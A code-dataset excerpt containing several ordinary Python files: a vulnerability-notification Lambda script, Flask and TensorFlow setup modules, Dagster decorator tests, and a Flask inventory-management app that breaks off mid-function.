logger.removeHandler(handler)\n\n # Get verbosity level from Lambda function event input\n if 'verbosity' in event:\n args.verbose = int(event['verbosity'])\n # Set log verbosity level\n if args.verbose:\n log_level = 50 - min((args.verbose-1) * 10, 50)\n # If log_level is set to NOTSET (0) here, it will delegate to the root\n # logger level, which is WARNING (30) by default. This is not what we\n # want if a user has set log_level to 5+ (highest level), so set to 1\n # instead of 0 to avoid this. Alternatively can set root logger to 0\n # via basicConfig above, but logging everything when a user doesn't\n # request any verbosity is also not desirable.\n log_level = 1 if log_level == 0 else log_level\n else:\n # Log nothing\n log_level = 60\n # Enable logging, use UTC rather than local date/time\n logging.Formatter.converter = gmtime\n logging.basicConfig(\n datefmt='%Y-%m-%dT%H:%M:%S',\n format='%(name)s | %(asctime)s.%(msecs)03dZ | %(levelname)s: %(message)s')\n logger.setLevel(log_level)\n logger.debug('main.py - {}'.format(__name__))\n\n # Parse config file\n logger.info('Parsing conf.ini...')\n config = configparser.ConfigParser()\n if not config.read('project/conf/conf.ini'):\n sys.exit('Failed to read conf.ini! Make sure that it exists and is '\n 'in the right location.')\n\n # Test, only call get_vulnerabilities() with test data\n TESTING = False\n if args.test:\n TESTING = True\n logger.info('Entering test mode...')\n vendor = input('Enter a vendor name: ')\n product = input('Enter a product name: ')\n keywords = input('Enter keyword (optional): ')\n asset = Asset(vendor, product, product, keywords)\n discovered_assets = {asset}\n get_vulnerabilities(config, discovered_assets)\n print(asset)\n for vuln in asset.vulnerabilities:\n print(vuln)\n for vuln in asset.vulnerabilities_unconfirmed:\n print(vuln)\n sys.exit('Finished testing')\n\n ### NOTIFICATIONS\n # Set of Notifications configured via conf/conf.ini\n logger.info('Getting configured notifications...')\n configured_notifications = get_notifications(config)\n\n ### ASSETS\n # Set of Assets discovered via configured Asset Backend(s)\n if not TESTING:\n try:\n # Check if Lambda event data is passed in\n if event and event['table_name'] and event['vendor_key'] and event['product_key']:\n args.table_name = event['table_name']\n args.vendor_key = event['vendor_key']\n args.product_key = event['product_key']\n except KeyError as KE:\n sys.exit('Expected event parameters not found - {}!'.format(KE))\n if not (args.table_name and args.vendor_key and args.product_key):\n sys.exit('You must pass in table name, vendor key, and product '\n 'key if not in test mode!')\n logger.info('Retrieving assets...')\n discovered_assets = get_assets(config)\n\n ### VULNERABILITY DATA SOURCES\n # Set of enabled VulnerabilitySources\n # TODO: consider this approach in future iteration\n #configured_vulnerability_sources = get_vulnerability_sources(config)\n\n ### VULNERABILITIES\n # TODO: consider this approach in future iteration\n #vulnerabilities = get_vulnerabilities(\n # configured_vulnerability_sources,\n # discovered_assets)\n logger.info('Getting vulnerabilities...')\n discovered_vulnerabilities = get_vulnerabilities(config, discovered_assets)\n\n # Relevant vulnerabilities found, send notification(s)\n if discovered_vulnerabilities:\n logger.info('Preparing notifications to send...')\n for configured_notification in configured_notifications:\n for vuln in discovered_vulnerabilities:\n configured_notification.message += str(vuln)\n configured_notification.send()\n # No relevant vulnerabilities discovered, do nothing\n else:\n logger.info('No relevant vulnerabilities discovered, exiting.')\n\n\ndef main():\n handler(dict(), None)\n\n\nif __name__ == '__main__':\n try:\n # Parameters event and context are sent by the AWS Lambda service\n main()\n except KeyboardInterrupt:\n print()\n","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"620685967","text":"import os\nimport distutils.util\nfrom tzlocal import get_localzone\n\nfrom app.version import __version__\n\n\nclass Config:\n SECRET_KEY = os.environ.get('SECRET_KEY', default='super-secret-phrase')\n TIMEZONE = get_localzone()\n\n PORTAL_SETTINGS = {\n 'host': os.environ.get('PORTAL_HOST', default='localhost'),\n 'client': os.environ.get('PORTAL_CLIENT', default=None),\n 'password': os.environ.get('PORTAL_PASSWORD', default=None),\n 'verify': distutils.util.strtobool(os.environ.get('PORTAL_VERIFY', default='True'))\n }\n\n MONGODB_SETTINGS = {\n 'db': os.environ.get('MONGODB_DB', default='data_mgmt'),\n 'host': os.environ.get('MONGODB_HOST', default='localhost'),\n 'port': int(os.environ.get('MONGODB_PORT', default=27017)),\n }\n\n SWAGGER = {\n 'specs_route': '/docs/',\n 'title': 'dmg-tracking API Documentation',\n 'uiversion': 3,\n 'description': 'This page describes the RESTful API of the dmg-tracking '+\n 'microservice. All request parameters and the full response '+\n 'content for each endpoint is described.',\n 'termsOfService': '',\n \"version\": __version__\n }\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"201369566","text":"# -*- coding: utf-8 -*-\nimport os\n\nimport tensorflow as tf\nimport tensorflow_hub as hub\nfrom tensorflow.compat.v1 import ConfigProto, Session\nfrom tensorflow.compat.v1.keras.backend import set_session\n\nfrom utils import get_cpuinfo\n\nnum_cores, num_sockets = get_cpuinfo()\nos.environ[\"KMP_AFFINITY\"] = \"granularity=fine,verbose,compact,1,0\"\nos.environ[\"KMP_BLOCKTIME\"] = \"1\"\nos.environ[\"OMP_NUM_THREADS\"] = str(num_cores)\n\nset_session(\n Session(\n config=ConfigProto(\n intra_op_parallelism_threads=num_cores,\n inter_op_parallelism_threads=num_sockets,\n )\n )\n)\n\n\ndef init():\n global detector\n model = \"https://tfhub.dev/google/openimages_v4/ssd/mobilenet_v2/1\"\n model_path = \"./models/\"\n detector = hub.load(model_path).signatures[\"default\"]\n detector(tf.zeros([1, 256, 256, 3], dtype=tf.dtypes.float32, name=\"init\"))\n print(\"Loaded detector!\")\n","sub_path":"openfaas/ssd_mobilenet.py","file_name":"ssd_mobilenet.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"280039768","text":"import re\n\nimport pytest\nfrom dagster import (\n Any,\n DagsterInvalidDefinitionError,\n DagsterInvariantViolationError,\n DependencyDefinition,\n Field,\n InputDefinition,\n Output,\n OutputDefinition,\n PipelineDefinition,\n composite_solid,\n execute_pipeline,\n execute_solid,\n graph,\n lambda_solid,\n op,\n pipeline,\n solid,\n)\nfrom dagster.core.utility_solids import define_stub_solid\n\n# This file tests a lot of parameter name stuff, so these warnings are spurious\n# pylint: disable=unused-variable, unused-argument, redefined-outer-name\n\n\ndef test_no_parens_solid():\n called = {}\n\n @lambda_solid\n def hello_world():\n called[\"yup\"] = True\n\n result = execute_solid(hello_world)\n\n assert called[\"yup\"]\n\n\ndef test_empty_solid():\n called = {}\n\n @lambda_solid()\n def hello_world():\n called[\"yup\"] = True\n\n result = execute_solid(hello_world)\n\n assert called[\"yup\"]\n\n\ndef test_solid():\n @solid(output_defs=[OutputDefinition()])\n def hello_world(_context):\n return {\"foo\": \"bar\"}\n\n result = execute_solid(hello_world)\n\n assert result.success\n assert result.output_value()[\"foo\"] == \"bar\"\n\n\ndef test_solid_one_output():\n @lambda_solid\n def hello_world():\n return {\"foo\": \"bar\"}\n\n result = execute_solid(hello_world)\n\n assert result.success\n assert result.output_value()[\"foo\"] == \"bar\"\n\n\ndef test_solid_yield():\n @solid(output_defs=[OutputDefinition()])\n def hello_world(_context):\n yield Output(value={\"foo\": \"bar\"})\n\n result = execute_solid(hello_world)\n\n assert result.success\n assert result.output_value()[\"foo\"] == \"bar\"\n\n\ndef test_solid_result_return():\n @solid(output_defs=[OutputDefinition()])\n def hello_world(_context):\n return Output(value={\"foo\": \"bar\"})\n\n result = execute_solid(hello_world)\n\n assert result.success\n assert result.output_value()[\"foo\"] == \"bar\"\n\n\ndef test_solid_with_explicit_empty_outputs():\n @solid(output_defs=[])\n def hello_world(_context):\n return \"foo\"\n\n with pytest.raises(DagsterInvariantViolationError) as exc_info:\n result = execute_solid(hello_world)\n\n assert (\n \"Error in solid hello_world: Unexpectedly returned output foo of type \"\n \". Solid is explicitly defined to return no results.\"\n ) in str(exc_info.value)\n\n\ndef test_solid_with_implicit_single_output():\n @solid()\n def hello_world(_context):\n return \"foo\"\n\n result = execute_solid(hello_world)\n\n assert result.success\n assert result.output_value() == \"foo\"\n\n\ndef test_solid_return_list_instead_of_multiple_results():\n @solid(output_defs=[OutputDefinition(name=\"foo\"), OutputDefinition(name=\"bar\")])\n def hello_world(_context):\n return [\"foo\", \"bar\"]\n\n with pytest.raises(DagsterInvariantViolationError) as exc_info:\n result = execute_solid(hello_world)\n\n assert \"unexpectedly returned output ['foo', 'bar']\" in str(exc_info.value)\n\n\ndef test_lambda_solid_with_name():\n @lambda_solid(name=\"foobar\")\n def hello_world():\n return {\"foo\": \"bar\"}\n\n result = execute_solid(hello_world)\n\n assert result.success\n assert result.output_value()[\"foo\"] == \"bar\"\n\n\ndef test_solid_with_name():\n @solid(name=\"foobar\", output_defs=[OutputDefinition()])\n def hello_world(_context):\n return {\"foo\": \"bar\"}\n\n result = execute_solid(hello_world)\n\n assert result.success\n assert result.output_value()[\"foo\"] == \"bar\"\n\n\ndef test_solid_with_input():\n @lambda_solid(input_defs=[InputDefinition(name=\"foo_to_foo\")])\n def hello_world(foo_to_foo):\n return foo_to_foo\n\n the_pipeline = PipelineDefinition(\n solid_defs=[define_stub_solid(\"test_value\", {\"foo\": \"bar\"}), hello_world],\n name=\"test\",\n dependencies={\"hello_world\": {\"foo_to_foo\": DependencyDefinition(\"test_value\")}},\n )\n\n pipeline_result = execute_pipeline(the_pipeline)\n\n result = pipeline_result.result_for_solid(\"hello_world\")\n\n assert result.success\n assert result.output_value()[\"foo\"] == \"bar\"\n\n\ndef test_lambda_solid_with_underscore_input():\n # Document that it is possible for lambda_solid to take an arg that the decorator machinery\n # would otherwise think is a context.\n @lambda_solid()\n def emit_input(_):\n return _\n\n @lambda_solid\n def emit_five():\n return 5\n\n @pipeline\n def basic_lambda_pipeline():\n emit_input(emit_five())\n\n pipeline_result = execute_pipeline(basic_lambda_pipeline)\n\n result = pipeline_result.result_for_solid(\"emit_input\")\n\n assert result.success\n assert result.output_value() == 5\n\n\ndef test_lambda_solid_definition_errors():\n with pytest.raises(\n DagsterInvalidDefinitionError, match=re.escape(\"positional vararg parameter '*args'\")\n ):\n\n @lambda_solid(input_defs=[InputDefinition(name=\"foo\")])\n def vargs(foo, *args):\n pass\n\n\ndef test_solid_definition_errors():\n with pytest.raises(\n DagsterInvalidDefinitionError, match=re.escape(\"positional vararg parameter '*args'\")\n ):\n\n @solid(input_defs=[InputDefinition(name=\"foo\")], output_defs=[OutputDefinition()])\n def vargs(context, foo, *args):\n pass\n\n with pytest.raises(DagsterInvalidDefinitionError):\n\n @solid(input_defs=[InputDefinition(name=\"foo\")], output_defs=[OutputDefinition()])\n def wrong_name(context, bar):\n pass\n\n with pytest.raises(DagsterInvalidDefinitionError):\n\n @solid(\n input_defs=[InputDefinition(name=\"foo\"), InputDefinition(name=\"bar\")],\n output_defs=[OutputDefinition()],\n )\n def wrong_name_2(context, foo):\n pass\n\n @solid(\n input_defs=[InputDefinition(name=\"foo\"), InputDefinition(name=\"bar\")],\n output_defs=[OutputDefinition()],\n )\n def valid_kwargs(context, **kwargs):\n pass\n\n @solid(\n input_defs=[InputDefinition(name=\"foo\"), InputDefinition(name=\"bar\")],\n output_defs=[OutputDefinition()],\n )\n def valid(context, foo, bar):\n pass\n\n @solid\n def valid_because_inference(context, foo, bar):\n pass\n\n\ndef test_wrong_argument_to_pipeline():\n def non_solid_func():\n pass\n\n with pytest.raises(\n DagsterInvalidDefinitionError, match=\"You have passed a lambda or function non_solid_func\"\n ):\n PipelineDefinition(solid_defs=[non_solid_func], name=\"test\")\n\n with pytest.raises(\n DagsterInvalidDefinitionError, match=\"You have passed a lambda or function \"\n ):\n PipelineDefinition(solid_defs=[lambda x: x], name=\"test\")\n\n\ndef test_descriptions():\n @solid(description=\"foo\")\n def solid_desc(_context):\n pass\n\n assert solid_desc.description == \"foo\"\n\n\ndef test_any_config_field():\n called = {}\n conf_value = 234\n\n @solid(config_schema=Field(Any))\n def hello_world(context):\n assert context.solid_config == conf_value\n called[\"yup\"] = True\n\n result = execute_solid(\n hello_world, run_config={\"solids\": {\"hello_world\": {\"config\": conf_value}}}\n )\n\n assert called[\"yup\"]\n\n\ndef test_solid_required_resources_no_arg():\n @solid(required_resource_keys={\"foo\"})\n def _noop():\n return\n\n\ndef test_solid_config_no_arg():\n with pytest.raises(\n DagsterInvalidDefinitionError,\n match=\"'_noop2' decorated function requires positional parameter 'context',\",\n ):\n\n @solid(config_schema={\"foo\": str})\n def _noop2():\n return\n\n\ndef test_solid_docstring():\n @solid\n def foo_solid(_):\n \"\"\"FOO_DOCSTRING\"\"\"\n return\n\n @lambda_solid\n def bar_solid():\n \"\"\"BAR_DOCSTRING\"\"\"\n return\n\n @solid(name=\"baz\")\n def baz_solid(_):\n \"\"\"BAZ_DOCSTRING\"\"\"\n return\n\n @lambda_solid(name=\"quux\")\n def quux_solid():\n \"\"\"QUUX_DOCSTRING\"\"\"\n return\n\n @composite_solid\n def comp_solid():\n \"\"\"COMP_DOCSTRING\"\"\"\n foo_solid()\n\n @pipeline\n def the_pipeline():\n \"\"\"THE_DOCSTRING\"\"\"\n quux_solid()\n\n @op\n def the_op():\n \"\"\"OP_DOCSTRING\"\"\"\n\n @graph\n def the_graph():\n \"\"\"GRAPH_DOCSTRING\"\"\"\n the_op()\n\n assert foo_solid.__doc__ == \"FOO_DOCSTRING\"\n assert foo_solid.description == \"FOO_DOCSTRING\"\n assert foo_solid.__name__ == \"foo_solid\"\n assert bar_solid.__doc__ == \"BAR_DOCSTRING\"\n assert bar_solid.description == \"BAR_DOCSTRING\"\n assert bar_solid.__name__ == \"bar_solid\"\n assert baz_solid.__doc__ == \"BAZ_DOCSTRING\"\n assert baz_solid.description == \"BAZ_DOCSTRING\"\n assert baz_solid.__name__ == \"baz_solid\"\n assert quux_solid.__doc__ == \"QUUX_DOCSTRING\"\n assert quux_solid.description == \"QUUX_DOCSTRING\"\n assert quux_solid.__name__ == \"quux_solid\"\n assert comp_solid.__doc__ == \"COMP_DOCSTRING\"\n assert comp_solid.description == \"COMP_DOCSTRING\"\n assert comp_solid.__name__ == \"comp_solid\"\n assert the_pipeline.__doc__ == \"THE_DOCSTRING\"\n assert the_pipeline.description == \"THE_DOCSTRING\"\n assert the_pipeline.__name__ == \"the_pipeline\"\n assert the_op.__doc__ == \"OP_DOCSTRING\"\n assert the_op.description == \"OP_DOCSTRING\"\n assert the_op.__name__ == \"the_op\"\n assert the_graph.__doc__ == \"GRAPH_DOCSTRING\"\n assert the_graph.description == \"GRAPH_DOCSTRING\"\n assert the_graph.__name__ == \"the_graph\"\n\n\ndef test_solid_yields_single_bare_value():\n @solid\n def return_iterator(_):\n yield 1\n\n with pytest.raises(\n DagsterInvariantViolationError,\n match=re.escape(\"Compute function for solid return_iterator yielded a value of type <\")\n + r\"(class|type)\"\n + re.escape(\n \" 'int'> rather than an instance of Output, AssetMaterialization, or ExpectationResult. \"\n \"Values yielded by solids must be wrapped in one of these types. If your solid has a \"\n \"single output and yields no other events, you may want to use `return` instead of \"\n \"`yield` in the body of your solid compute function. If you are already using \"\n \"`return`, and you expected to return a value of type <\"\n )\n + r\"(class|type)\"\n + re.escape(\n \" 'int'>, you may be inadvertently returning a generator rather than the value you \"\n \"expected.\"\n ),\n ):\n result = execute_solid(return_iterator)\n\n\ndef test_solid_yields_multiple_bare_values():\n @solid\n def return_iterator(_):\n yield 1\n yield 2\n\n with pytest.raises(\n DagsterInvariantViolationError,\n match=re.escape(\"Compute function for solid return_iterator yielded a value of type <\")\n + r\"(class|type)\"\n + re.escape(\n \" 'int'> rather than an instance of Output, AssetMaterialization, or ExpectationResult. \"\n \"Values yielded by solids must be wrapped in one of these types. If your solid has a \"\n \"single output and yields no other events, you may want to use `return` instead of \"\n \"`yield` in the body of your solid compute function. If you are already using \"\n \"`return`, and you expected to return a value of type <\"\n )\n + r\"(class|type)\"\n + re.escape(\n \" 'int'>, you may be inadvertently returning a generator rather than the value you \"\n \"expected.\"\n ),\n ):\n result = execute_solid(return_iterator)\n\n\ndef test_solid_returns_iterator():\n def iterator():\n for i in range(3):\n yield i\n\n @solid\n def return_iterator(_):\n return iterator()\n\n with pytest.raises(\n DagsterInvariantViolationError,\n match=re.escape(\"Compute function for solid return_iterator yielded a value of type <\")\n + r\"(class|type)\"\n + re.escape(\n \" 'int'> rather than an instance of Output, AssetMaterialization, or ExpectationResult. \"\n \"Values yielded by solids must be wrapped in one of these types. If your solid has a \"\n \"single output and yields no other events, you may want to use `return` instead of \"\n \"`yield` in the body of your solid compute function. If you are already using \"\n \"`return`, and you expected to return a value of type <\"\n )\n + r\"(class|type)\"\n + re.escape(\n \" 'int'>, you may be inadvertently returning a generator rather than the value you \"\n \"expected.\"\n ),\n ):\n result = execute_solid(return_iterator)\n\n\ndef test_input_default():\n @lambda_solid\n def foo(bar=\"ok\"):\n return bar\n\n result = execute_solid(foo)\n assert result.output_value() == \"ok\"\n","sub_path":"python_modules/dagster/dagster_tests/core_tests/definitions_tests/decorators_tests/test_solid.py","file_name":"test_solid.py","file_ext":"py","file_size_in_byte":12719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"397012037","text":"from flask import Flask,render_template,url_for,redirect,request,flash,make_response\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy.sql import func,or_\nfrom datetime import datetime,date\nimport pdfkit\nconfig = pdfkit.configuration(wkhtmltopdf='C:\\\\Program Files\\\\wkhtmltopdf\\\\bin\\\\wkhtmltopdf.exe')\n\napp = Flask('__name__')\n\napp.config['SQLALCHEMY_DATABASE_URI']='sqlite:///inventory.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config[\"SECRET_KEY\"]=\"SECRETKEY_TEST\"\ndb = SQLAlchemy(app)\n\n\nclass Product(db.Model):\n\tid = db.Column(db.Integer,primary_key=True)\n\tname = db.Column(db.String(100),nullable=False)\n\tdate_created = db.Column(db.DateTime, default=datetime.utcnow)\n\tdate_updated = db.Column(db.DateTime, default=datetime.utcnow)\n\tdef __repr__(self):\n\t\treturn 'Product'+str(self.id)\n\nclass Location(db.Model):\n\tid = db.Column(db.Integer,primary_key=True)\n\tname = db.Column(db.String(100),nullable=False)\n\tdate_created = db.Column(db.DateTime, default=datetime.utcnow)\n\tdate_updated = db.Column(db.DateTime, default=datetime.utcnow)\n\tdef __repr__(self):\n\t\treturn 'Location'+str(self.id)\nclass ProductMovement(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n timestamp = db.Column(db.DateTime, default=datetime.utcnow)\n from_location = db.Column(db.String(100))\n to_location = db.Column(db.String(100))\n product_id = db.Column(db.Integer, nullable=False)\n product_name = db.Column(db.String(50), nullable=False)\n product_qty = db.Column(db.Integer, nullable=False)\n date_created = db.Column(db.DateTime, default=datetime.utcnow)\n date_updated = db.Column(db.DateTime, default=datetime.utcnow)\n Flag = db.Column(db.String(50),nullable=False)\n def __repr__(self):\n \treturn 'Movement'+str(self.id)\n\n@app.route('/')\n@app.route('/home')\ndef home():\n\tmessage=None\n\tinventory_details = get_data()\n\tif not inventory_details:\n\t\t\tmessage = \"Currently Data is unavailable.Add Now!\"\n\n\treturn render_template('index.html',details=inventory_details,message=message)\n\n\n@app.route('/download_pdf')\ndef download_pdf():\n\t\n\t\n\tinventory_details = get_data()\n\n\trendered =render_template('download_pdf.html',details=inventory_details)\n\tcss = ['main.css']\n\tpdf = pdfkit.from_string(rendered,False,configuration=config,css=css)\n\n\tresponse = make_response(pdf)\n\tresponse.headers[\"Content-Type\"] = \"application/pdf\"\n\tresponse.headers['Content-Dispostion'] ='inline; filename=output.pdf'\n\t\n\treturn response\n\n@app.route('/product', methods=['GET','POST'])\ndef products():\n\tif request.method=='POST':\n\t\tif 'add_product_name' in request.form:\n\t\t\tproduct_name = request.form['add_product_name']\n\t\t\tif not product_name.strip():\n\t\t\t\tflash(f\"Product name is empty or contains only spaces!\", \"danger\")\n\t\t\t\treturn redirect('/product')\n\t\t\telif bool(Product.query.filter(func.lower(Product.name) == func.lower(product_name)).first()):\n\t\t\t\tflash(f\"'{product_name}' already exists!\", \"danger\")\n\t\t\t\treturn redirect('/product')\n\t\t\telse:\n\t\t\t\tnew_product=Product(name=product_name)\n\t\t\t\tdb.session.add(new_product)\n\t\t\t\tdb.session.commit()\n\t\t\t\tflash(f\"'{product_name}' is successfully added!\", \"success\")\n\t\t\t\treturn redirect('/product')\n\t\t\n\t\tif 'delete_product_id' in request.form:\n\t\t\tproduct_id = request.form['delete_product_id']\n\t\t\tproduct_name = ProductMovement.query.filter(ProductMovement.product_id==product_id,ProductMovement.Flag =='A').first() \n\t\t\tif product_name is not None:\n\t\t\t\tflash(f\"'Product used in movement cannot be deleted!\", \"danger\")\n\t\t\t\treturn redirect('/product')\n\t\t\telse:\n\t\t\t\tdelete_product = Product.query.get_or_404(product_id)\n\t\t\t\tdb.session.delete(delete_product)\n\t\t\t\tdb.session.commit()\n\t\t\t\tflash(f\"'{delete_product.name}' is successfully deleted!\", \"danger\")\n\t\t\t\treturn redirect('/product')\n\n\n\t\tif 'editproduct' in request.form:\n\t\t\tupdate_product_name = request.form['product_name']\n\t\t\tif bool(Product.query.filter(func.lower(Product.name) == func.lower(update_product_name)).first()):\n\t\t\t\tflash(f\"'{update_product_name}' already exists!\", \"danger\")\n\t\t\t\treturn redirect('/product')\n\t\t\telse:\n\t\t\t\tupdate_product_id = request.form['editproduct']\n\t\t\t\tupdate = Product.query.get_or_404(update_product_id)\n\t\t\t\te_id=ProductMovement.query.filter_by(product_id=update_product_id)\n\t\t\t\tfor i in e_id:\n\t\t\t\t\tedit_movement = ProductMovement.query.get_or_404(i.id)\n\t\t\t\t\tedit_movement.product_name=update_product_name\n\t\t\t\tupdate.name = update_product_name\n\t\t\t\tupdate.date_updated = datetime.utcnow()\n\t\t\t\tdb.session.commit()\n\t\t\t\tflash(f\" Product successfully updated!\", \"info\")\n\t\t\t\treturn redirect('/product')\n\telse:\n\t\tall_product = Product.query.order_by(Product.id).all()\n\t\tmessage = None\n\t\tproduct_details = get_data(\"product\")\n\t\tif not product_details:\n\t\t\tmessage = \"Currently Data is unavailable.Add Now!\"\n\t\t\n\t\treturn render_template('product.html',product_details=product_details,message=message)\n\n@app.route('/location',methods=['GET','POST'])\ndef locations():\n\tif request.method=='POST':\n\t\tif 'add_location_name' in request.form:\n\t\t\tlocation_name = request.form['add_location_name']\n\t\t\tif not location_name.strip():\n\t\t\t\tflash(f\"warehouse is empty or contains only spaces!\", \"danger\")\n\t\t\t\treturn redirect('/location')\n\t\t\telif bool(Location.query.filter(func.lower(Location.name) == func.lower(location_name)).first()):\n\t\t\t\tflash(f\"'{location_name}' warehouse already exists in the data!\", \"danger\")\n\t\t\t\treturn redirect('/location')\n\t\t\telse:\n\t\t\t\tnew_location=Location(name=location_name)\n\t\t\t\tdb.session.add(new_location)\n\t\t\t\tdb.session.commit()\n\t\t\t\tflash(f\"'{location_name}' warehouse is successfully added!\", \"success\")\n\t\t\t\treturn redirect('/location')\n\n\t\tif 'delete_location_id' in request.form:\n\t\t\tlocation_id = request.form['delete_location_id']\n\t\t\told_location_name = Location.query.filter_by(id=location_id).first() \n\t\t\tf_id=ProductMovement.query.filter(or_(ProductMovement.from_location == old_location_name.name,ProductMovement.to_location == old_location_name.name),ProductMovement.Flag =='A').first()\n\t\t\tif f_id is not None:\n\t\t\t\tflash(f\" Location used in movement cannot be deleted !\", \"danger\")\n\t\t\t\treturn redirect('/location')\n\t\t\telse:\n\t\t\t\tdelete_location = Location.query.get_or_404(location_id)\n\t\t\t\tdb.session.delete(delete_location)\n\t\t\t\tdb.session.commit()\n\t\t\t\tflash(f\"'{delete_location.name}' warehouse successfully deleted\", \"danger\")\n\t\t\t\treturn redirect('/location')\n\n\t\tif 'editlocation' in request.form:\n\t\t\tupdate_location_name = request.form['location_name']\n\t\t\tif bool(Location.query.filter(func.lower(Location.name) == func.lower(update_location_name)).first()):\n\t\t\t\tflash(f\"'{update_location_name}' warehouse already exists in the data!\", \"danger\")\n\t\t\t\treturn redirect('/location')\n\t\t\telse:\n\t\t\t\tupdate_location_id = request.form['editlocation']\n\t\t\t\told_location_name = Location.query.filter_by(id=update_location_id).first() \n\t\t\t\tupdate = Location.query.get_or_404(update_location_id)\n\t\t\t\tf_id=ProductMovement.query.filter_by(from_location = old_location_name.name)\n\t\t\t\tfor i in f_id:\n\t\t\t\t\tedit_movement = ProductMovement.query.get_or_404(i.id)\n\t\t\t\t\tedit_movement.from_location=update_location_name\n\t\t\t\tt_id=ProductMovement.query.filter_by(to_location=old_location_name.name)\n\t\t\t\tfor i in t_id:\n\t\t\t\t\tedit_movement = ProductMovement.query.get_or_404(i.id)\n\t\t\t\t\tedit_movement.to_location=update_location_name\n\t\t\t\tupdate.name = update_location_name\n\t\t\t\tupdate.date_updated = datetime.utcnow()\n\t\t\t\tdb.session.commit()\n\t\t\t\tflash(f\" Warehouse successfully updated to '{update.name}'!\", \"info\")\n\t\t\t\treturn redirect('/location')\n\telse:\n\t\tall_location = Location.query.order_by(Location.id).all()\n\t\tlocation_details = get_data(\"location\")\n\t\tmessage=None\n\t\tif not location_details:\n\t\t\tmessage = \"Currently Data is unavailable. Add Now!\"\n\t\treturn render_template('location.html',location_details=location_details,message=message)\n\n\n@app.route('/movement', methods=['GET','POST'])\ndef movement():\n\tif request.method=='POST':\n\t\tif 'add_product_qty' in request.form:\n\t\t\tcheck = None \n\t\t\tproduct_name = request.form['product_name']\n\t\t\tfrom_location = request.form['from_location']\n\t\t\tto_location = request.form['to_location']\n\t\t\tproduct_qty = request.form['add_product_qty']\n\t\t\tif product_name == 'Select product':\n\t\t\t\tflash(f\"Please select product to add movement!\", \"danger\")\n\t\t\t\treturn redirect('/movement')\n\t\t\telif int(product_qty) == 0 or int(product_qty) < 0:\n\t\t\t\tflash(f\"Please add quantity !\", \"danger\")\n\t\t\t\treturn redirect('/movement')\n\t\t\telif from_location == to_location :\n\t\t\t\tflash(f\"From Location & To Location cannot be same!\", \"danger\")\n\t\t\t\treturn redirect('/movement')\n\t\t\telse:\n\t\t\t\tproduct_details = Product.query.filter_by(name=product_name).first()\n\t\t\t\tadd_movement=ProductMovement()\n\t\t\t\tadd_movement.product_id=product_details.id\n\t\t\t\tadd_movement.product_name=product_details.name\n\t\t\t\t\n\t\t\t\tcheck_location = ProductMovement.query.filter_by(product_name=product_name).filter_by(to_location=from_location,Flag='A').count()\n\t\t\t\tif from_location == 'Select Location':\n\t\t\t\t\tadd_movement.from_location=\"---\"\n\t\t\t\t\tadd_movement.to_location=to_location\n\t\t\t\telif to_location == 'Select Location':\n\t\t\t\t\tadd_movement.to_location = \"---\"\n\t\t\t\t\tadd_movement.from_location=from_location\n\t\t\t\telif check_location == 0 and from_location != 'Select Location':\n\t\t\t\t\tflash(f\"Product not available at '{from_location}' Warehouse !\", \"danger\")\n\t\t\t\t\treturn redirect('/movement')\n\t\t\t\telse:\n\t\t\t\t\tadd_movement.from_location=from_location\n\t\t\t\t\tadd_movement.to_location=to_location\n\n\t\t\t\tsum_qty = get_total(product_name,from_location)\n\t\t\t\t\n\t\t\t\tif int(product_qty) > sum_qty and from_location != 'Select Location':\n\t\t\t\t\tflash(f\" Only {sum_qty} quantity is available at '{from_location}' Warehouse !\", \"danger\")\n\t\t\t\t\treturn redirect('/movement')\n\t\t\t\telse:\n\t\t\t\t\tadd_movement.product_qty=product_qty\n\t\t\t\tadd_movement.Flag = 'A'\n\t\t\t\tdb.session.add(add_movement)\n\t\t\t\tdb.session.commit()\n\t\t\t\tflash(f\" '{add_movement.product_name}' movement is successfully added!\", \"success\")\n\t\t\t\treturn redirect('/movement')\n\n\t\tif 'delete_movement_id' in request.form:\n\t\t\tmovement_id = request.form['delete_movement_id']\n\t\t\tproduct_name = request.form['delete_product_name']\n\t\t\tto_location = request.form['delete_to_location']\n\t\t\tfcheck_qty = get_export_data(product_name,to_location,movement_id,\"future\")\n\t\t\tfcheck_qty= fcheck_qty.first()\n\t\t\tif fcheck_qty is None :\n\t\t\t\tdelete_movement = ProductMovement.query.get_or_404(movement_id)\n\t\t\t\tflash(f\"{product_name} movement successfully deleted\", \"danger\")\n\t\t\t\tdelete_movement.Flag = 'I'\n\t\t\t\tdb.session.commit()\n\t\t\t\treturn redirect('/movement')\n\n\t\t\tif fcheck_qty is not None:\n\t\t\t\tflash(f\" Please delete {fcheck_qty.from_location} to {fcheck_qty.to_location} movement before current movement !\", \"danger\")\n\t\t\t\treturn redirect('/movement')\n\t\t\t\n\n\n\t\tif 'edit_movement' in request.form :\n\t\t\tvalid = True\n\t\t\tmovement_id = request.form['edit_movement']\n\t\t\tproduct_name = request.form['product_name']\n\t\t\tfrom_location = request.form['from_location']\n\t\t\tto_location = request.form['to_location']\n\t\t\tproduct_qty = request.form['product_qty']\n\t\t\tproduct_details = Product.query.filter_by(name=product_name).first()\n\t\t\tedit_movement = ProductMovement.query.get_or_404(movement_id)\n\n\t\t\tif from_location == \"---\":\n\t\t\t\tpast_sum_qty = get_total(product_name,to_location,movement_id,\"past\")\n\t\t\telse :\n\t\t\t\tpast_sum_qty = get_total(product_name,from_location,movement_id,\"past\")\n\n\t\t\tif to_location == \"---\" :\n\t\t\t\tfuture_sum_qty = get_total(product_name,from_location,movement_id,\"future\")\n\t\t\telse :\n\t\t\t\tfuture_sum_qty = get_total(product_name,to_location,movement_id,\"future\")\n\t\t\t\n\t\t\tif from_location == to_location : #from location & to location cant be same.\n\t\t\t\tvalid = False\n\t\t\t\tflash(f\"From Location & To Location cannot be same!\", \"danger\")\n\t\t\t\treturn 